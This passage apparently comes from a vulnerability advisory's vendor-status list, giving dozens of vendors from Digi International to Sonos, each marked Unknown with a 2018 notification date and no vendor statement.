Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Digi International Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### DragonFly BSD Project Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ENEA Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### EfficientIP SAS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ericsson Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Espressif Systems Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### European Registry for Internet Domains Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Express Logic Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Extreme Networks Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### F-Secure Corporation Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### F5 Networks, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fastly Unknown\n\nNotified: August 29, 2018 Updated: August 29, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Force10 Networks Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fortinet, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Foundry Brocade Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### FreeBSD Project Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### GFI Software, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### GNU adns Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### GNU glibc Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Geexbox Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Gentoo Linux Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Google Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### HP Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### HTC Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### HardenedBSD Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hewlett Packard Enterprise Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hitachi Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### HomeSeer Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Honeywell Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Huawei Technologies Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM Global Services Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM eServer Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM, INC. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### INTEROP Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Illumos Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### InfoExpress, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Infoblox Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Inmarsat Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Intel Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Internet Systems Consortium Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Internet Systems Consortium - DHCP Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Interniche Technologies, inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### JH Software Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Joyent Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Kyocera Communications Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### LANCOM Systems GmbH Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### LG Electronics Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lancope Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lantronix Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lenovo Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Linksys Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Lynx Software Technologies Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Marvell Semiconductors Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### McAfee Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MediaTek Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Medtronic Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Men & Mice Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MetaSwitch Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Micro Focus Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Microchip Technology Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Microsoft Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Microsoft Vulnerability Research Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Miredo Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Mitel Networks, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### MontaVista Software, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Motorola, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Muonics, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NAS4Free Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NEC Corporation Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NETSCOUT Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NIKSUN Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NetBSD Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### NetBurner Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Netgear, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nexenta Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nixu Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nokia Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Nominum Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OmniTI Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenBSD Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenConnect Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenDNS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenIndiana Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Oracle Corporation Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Oryx Embedded Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### PHPIDS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Paessler Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Pantech North America Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Peplink Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Philips Electronics Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### PowerDNS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Proxim, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Pulse Secure Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QLogic Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QNX Software Systems Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### QUALCOMM Incorporated Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Quadros Systems Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Quagga Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Quantenna Communications Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Red Hat, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### ReefEdge, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Riverbed Technologies Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Rocket RTOS Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Roku Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ruckus Wireless Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SMC Networks, Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SUSE Linux Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SafeNet Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Samsung Mobile Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Samsung Semiconductor Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Secure64 Software Corporation Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sierra Wireless Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Snort Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### SonicWall Unknown\n\nNotified: July 18, 2018 Updated: July 18, 2018 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Sonos Unknown\n\nNotified: July 18, 2018 Updated: July 18, 